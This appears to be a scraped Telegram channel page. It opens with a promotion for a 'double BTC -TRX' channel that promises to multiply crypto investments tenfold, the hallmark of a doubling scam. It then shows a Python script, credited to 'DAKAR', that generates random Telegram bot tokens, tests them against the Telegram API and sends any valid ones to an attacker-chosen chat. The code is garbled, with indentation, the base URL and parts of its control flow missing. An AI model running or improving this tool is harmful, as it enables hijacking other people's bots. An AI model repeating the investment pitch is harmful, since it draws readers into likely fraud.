Are you looking to double your BTC and TRX cryptocurrency investments? Look no further than the 'double BTC -TRX' Telegram channel managed by the user 'djq_o'. This channel offers a unique opportunity for cryptocurrency enthusiasts to potentially multiply their investments by 10 times. With a combination of expert analysis, market insights, and timely updates, 'double BTC -TRX' provides members with valuable information to make informed decisions in the volatile world of cryptocurrency trading. Join today to take advantage of this exciting opportunity and watch your investments grow! Don't miss out on this chance to maximize your profits in the world of digital currency.
21 Nov, 18:29
21 Nov, 18:25
21 Nov, 16:32
21 Nov, 14:57
from rich.progress import track
from rich.text import Text
from rich.panel import Panel
from rich.table import Table
from rich.console import Console
from rich import print, box
import random
import requests
main_bot_token = input("Bot Token | ")
target_chat_id = input("Chat ID | ")
console = Console()
r = requests.session()
def generate_token_list():
rr = "1234567890"
dd = "qQwWeErRtTyYUuiIoOpPaAsSDdfFgGhHjJkKlLzZXxCcVvBbNnMm1234567890-_"
b = ("2", "5")
bb = ("AAF", "AAG")
tokens = []
for _ in range(490):
prefix = random.choice(bb)
segment1 = random.choice(b)
segment2 = ''.join(random.choice(rr) for _ in range(9))
segment3 = ''.join(random.choice(dd) for _ in range(32))
token = f"{prefix}{segment1}{segment2}:{segment3}"
return tokens
def send_valid_token(token, bot_id, bot_name, bot_username):
message = f"""
𝗩𝗔𝗟𝗜𝗗 𝗧𝗢𝗞𝗘𝗡\n\n𝗜𝗗: {bot_id}\n𝗡𝗔𝗠𝗘: {bot_name}\n𝗨𝗦𝗘𝗥𝗡𝗔𝗠𝗘: {bot_username}\n𝗧𝗢𝗞𝗘𝗡: {token}
data={"text": message, "chat_id": target_chat_id}
def check_tokens():
tokens = generate_token_list()
valid_tokens = 0
for token in track(tokens, description="[green]Checking tokens...[/green]"):
url = f"{token}/getMe"
response = requests.get(url).json()
if response.get("ok"):
valid_tokens += 1
bot_info = response.get("result", {})
bot_id = str(bot_info.get("id"))
bot_name = bot_info.get("first_name", "N/A")
bot_username = bot_info.get("username", "N/A")
table = Table(title="Valid Token Found!", box=box.SQUARE)
table.add_column("ID", style="cyan")
table.add_column("Name", style="magenta")
table.add_column("Username", style="green")
table.add_column("Token", style="red")
table.add_row(bot_id, bot_name, bot_username, token)
send_valid_token(token, bot_id, bot_name, bot_username)
console.print(f"[bold red]Invalid Token:[/bold red] {token}")
except requests.exceptions.RequestException as e:
console.print(f"[bold red]Error:[/bold red] {str(e)}")
def display_signature():
panel_content = Text("DAKAR", justify="center", style="bold green")
panel = Panel(
title="Programming BY @z3_2q •",
subtitle="Programming BY DAKAR•",
if __name__ == "__main__":
21 Nov, 01:42
21 Nov, 00:32
20 Nov, 19:14
20 Nov, 17:40
18 Nov, 06:05